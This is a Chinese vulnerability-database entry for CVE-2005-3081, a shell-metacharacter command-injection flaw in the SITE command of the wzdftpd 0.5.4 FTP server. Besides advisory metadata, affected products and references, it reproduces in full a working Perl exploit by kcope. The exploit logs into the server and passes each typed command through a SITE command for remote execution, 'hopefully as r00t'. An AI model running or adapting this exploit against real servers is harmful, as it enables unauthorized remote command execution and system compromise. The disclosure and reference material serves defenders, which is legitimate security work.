Wzdftpd SITE Command 任意指令执行漏洞

漏洞ID	1109090	漏洞类型	输入验证
发布时间	2005-09-24	更新时间	2006-12-15
CVE编号	CVE-2005-3081	CNNVD-ID	CNNVD-200509-251
漏洞平台	Linux	CVSS评分	4.6

|漏洞来源

https://www.exploit-db.com/exploits/1231
https://www.securityfocus.com/bid/14935
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-251

|漏洞详情

wzdftpd是一个模块化跨平台多线程FTP服务器。wzdftpd0.5.4中存在安全漏洞，远程验证用户可以通过SITE指令中的shell元字符执行任意指令。

|漏洞EXP

######################################################
# 0day0day0day0day0day0day0day
# -------------------------------
# wzdftpd remote exploit by kcope
# nice call to popen(3) on custom 
# site commands...
#
# August 2005
# confidential! keep private!
# -------------------------------
# 0day0day0day0day0day0day0day
#
#                    .___ _____  __             .___
#__  _  __________ __| _// ____\/  |_______   __| _/
#\ \/ \/ /\___   // __ |\   __\\   __\____ \ / __ | 
# \     /  /    // /_/ | |  |   |  | |  |_> > /_/ | 
#  \/\_/  /_____ \____ | |__|   |__| |   __/\____ | 
#               \/    \/             |__|        \/ 
#                                      
#__  _  _______ _______   ____ ________
#\ \/ \/ /\__  \\_  __ \_/ __ \\___   /
# \     /  / __ \|  | \/\  ___/ /    / 
#  \/\_/  (____  /__|    \___  >_____ \
#              \/            \/      \/ VER1
######################################################

use Net::FTP;

sub usage {
	print "usage: wzdftpdwarez.pl remote_host remote_port user pass custom_site_command\n"
	     ."default guest account for wzdftpd is username/password: guest/%\n";
}

print "
wzdftpd remote exploit by kcope
August 2005
confidential! keep private!

";

if ($#ARGV < 4) {
	usage();
	exit();	 
}

$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$sitecmd = $ARGV[4];

$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)
     or die "Cannot connect to $host: $@";

$ftp->login($user, $pass)
     or die "Cannot login ", $ftp->message;
     
print "Now you can type commands, hopefully as r00t!\n";
while(1) {
	print "!\$%&#>";
	$cmd=<stdin>;
	$ftp->site($sitecmd, "|$cmd;");
	print $ftp->message();
}

# milw0rm.com [2005-09-24]

|受影响的产品

wzdftpd wzdftpd 0.5.4 wzdftpd wzdftpd 0.5.2 Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1

|参考资料

来源:BID
名称:14935
链接:http://www.securityfocus.com/bid/14935
来源:MISC
链接:http://www.securiteam.com/exploits/5CP0R1PGUE.html
来源:OSVDB
名称:19682
链接:http://www.osvdb.org/19682
来源:SECUNIA
名称:16936
链接:http://secunia.com/advisories/16936
来源:FULLDISC
名称:20050924It'stimeforsomewarez-wzdftpdremoteexploit
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0646.html
来源:DEBIAN
名称:DSA-1006
链接:http://www.debian.org/security/2006/dsa-1006